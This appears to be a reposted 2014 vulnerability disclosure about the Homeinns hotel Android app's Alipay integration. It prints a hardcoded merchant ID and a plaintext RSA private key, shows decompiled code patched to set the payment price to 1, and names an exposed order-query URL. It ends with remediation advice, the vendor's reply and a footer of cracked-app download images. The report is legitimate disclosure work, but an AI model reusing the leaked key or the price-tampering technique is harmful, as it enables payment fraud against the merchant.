2014-04-15:细节已通知厂商并且等待厂商处理中
2014-04-15:厂商已经确认,细节仅向厂商公开
2014-04-25:细节向核心白帽子及相关领域专家公开
2014-05-05:细节向普通白帽子公开
2014-05-25:细节向实习白帽子公开
2014-07-14:厂商已经修复漏洞并主动公开,细节向公众公开
1.如家酒店官方版Android客户端程序的集成支付宝支付功能存在漏洞,原因是支付信息硬编码并且应用代码没有经过混淆和反重打包保护
2.客户端程序中支付成功的回调地址所在Web服务器存在目录遍历漏洞
1.掌上如家App集成了支付宝支付功能,支付所需的商家ID,商户签名私钥都硬编码在代码中并且直接是明文
public class PartnerConfig
{
public static final String ALIPAY_PLUGIN_NAME = "alipay_plugin_20120428msp.apk";
public static final String PARTNER = "2088011831474463";
public static final String RSA_ALIPAY_PUBLIC = "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDjYGtHCa4IUMruec0EElEwnqRb0XP2MlcUNQuT ptuUP+7DB6o4kZn70wNFYD/sdt3ovsc9JeAVbVgRxYo3E+oYqoBuxOvGLDKWo/27/3Dr79cbk/Se o2RTNHcwHA75bmDC5QApxZKlnAF5nUWfi8keT5ODBm7lyP778kJ79CktGQIDAQAB";
public static final String RSA_PRIVATE = "MIICdgIBADANBgkqhkiG9w0BAQEFAASCAmAwggJcAgEAAoGBANA6mEftVKQXspVuALBjaCdxh666jnwXVE06SDY70hyzUtrcm/IXaXRZZD44URXSh6Hb0Waxl+/ajtXhD3c3xyFBIuGxL9lpWph79B37dVFUUpbI3aZo8PD3HJDXj3Yfl/jRrcGI8ZiuHX/Bwnx9O3psXEpCi9ZJWZ0VG71LaCAvAgMBAAECgYByVLnoRFeFAb38bjnSn8JAZgWp2qUBXY3cGXQs0wu61ntX0GmPs2sjhzGTODjNUptGM/v19u0FtWtX5Asp2mZqzg9gfZfnPNKzxBbV0azV9wVgHQe2+OwI/1+YAScqbthDvSsFz0d6lLBYx4c10YVxmg/jAAOUYkNlqMcF6kWdgQJBAPKKbSGKrLco7mD29CeE1Y3tdG58J/daY4AuSty6bMhZOcyunMO0YsYERJA9IQRDDjlApIoZ5EhIcrfhcuDzCj0CQQDbyLqWTSahKbE6cac0yddhHvcUxqirZDoPoJcFMksXQR5BVaHLZ7ZVEYJHt7A2ah1vFb/Js0Bj7bVgNfl5g7bbAkAmUInW36JTOOsXdEuzpn9Z8WYQQhrKL4RCbo2y+txOdhH0bK0lGWz1HR17r7x0gOdRUg3sJxTx+kftFndgY+R9AkAMvzqbJwRbioh95EOXWzGDr4ETEmaL8jcv2teHdKBIS/2OOoI0wuIfUvGkaTHuJf9pBvDlqODOKuY/G0JJ2urLAkEA5BvmwjhSrUndj4AYGGplKJnRZYAP5QH9Mb7ysE2n+dKPpxULJ9Ys1bV7HodmCDSyxLTqulj3hTmMhJwyF2/hdg==";
public static final String SELLER = "2088011831474463";
}
2.在预定房间并进行到支付宝支付界面时,传入的支付金额未做验证。通过数据流分析方法找到支付金额传入的源,通过修改该处的值,可以修改实际支付金额
public void onClick(View paramView)
{
if ((isAlipay) || (isHomeInnPay))
{
if (paramView.getId() == 2131034246)
getActivity().getIntent().putExtra("payment_pay_price", intent.getIntExtra("first_day_price", 0));
while (true)
{
((PaymentOperateActivity)getActivity()).switchContent(18874371);
return;
getActivity().getIntent().putExtra("payment_pay_price", intent.getIntExtra("total_price", 0));
}
}
noSupportAlert.show();
}
3.提供给支付宝的支付成功回调URL所在Web服务器存在目录遍历漏洞,并且可通过页面http://api.homeinns.com/AlipayNew/Query/export_trade_account_report/Default.aspx
查询如家酒店的支付宝订单
1.对于漏洞1,可以利用的途径是篡改商户ID和私钥,改成攻击者在支付宝上注册的商户ID和私钥,从而将现金转入攻击者账号,但未论证攻击。但是在支付宝提供的Demo代码中,将商户ID和私钥设置为如家的,金额正常转入到如家支付宝账号。

2.对于漏洞2,通过反编译App并且修改支付金额参数传入的相关代码,并且重打包应用。安装到手机后,证实该漏洞可以利用
public void onClick(View paramView)
{
if ((isAlipay) || (isHomeInnPay))
{
if (paramView.getId() == 2131034246)
getActivity().getIntent().putExtra("payment_pay_price", 1);
while (true)
{
((PaymentOperateActivity)getActivity()).switchContent(18874371);
return;
getActivity().getIntent().putExtra("payment_pay_price", 1);
}
}
noSupportAlert.show();
}

3.对于漏洞3的证明,如下图:

漏洞修复建议:
1.对掌上如家客户端的代码进行混淆,加大逆向分析难度;
2.支付宝支付参数不要硬编码,支付订单的签名功能可以放在服务器端完成;
3.对客户端程序进行安全加固,启动时检测应用是否被重打包
4.Web服务器进行安全配置,拒绝目录遍历
漏洞回应 厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2014-04-15 17:07
厂商回复:感谢关注!关于漏洞2,我们还有人工流程,可以进行一定的检查。
最新状态:2014-06-10:漏洞已修复。
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;

![英雄棋士团(预下载)?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/yingxiongqishituanyuxiazai.jpg)
![美食小当家?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/meishixiaodangjia.png)
![2047?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/2047.jpg)
![荣誉指挥官(预下载)?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/rongyuzhihuiguanyuxiazai.png)
![繁荣美食市场物语?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/fanrongmeishishichangwuyu.jpg)
![夸克浏览器 v4.2.1.138 好用的手机浏览器?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/kuakezuolanqi.jpg)
![移动办公软件 OfficeSuite Premium v10.18.28716 内购解锁版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/yidongbangongruanjian.jpg)
![乐秀视频编辑器 VideoShow v8.8.4 内购解锁版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/lexiushipinbianjiqi.png)
![X 浏览器 v3.3.9 一款小巧的安卓浏览器?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/x.jpg)
![安卓密码管理软件 Enpass v6.4.5.368 内购解锁版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/anzhuomimaguanliruanjian.jpg)
![差分复制同步 FastCopy-M v3.6.3.51 绿色便携版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/FastCopy3.png)
![多标签页拓展 Clover v3.5.2 Build 19809 精简绿色版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/Clover.png)
![文件重命名 Advanced Renamer v3.85 Lite 绿色便携版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/Advanced_Renamer.png)
![网络防火监控 GlassWire Elite v2.1.166 绿色便携版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/GlassWire.png)
![影音播放器 Daum Potplayer v1.7.20538 美化便携版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/PotPlayer.png)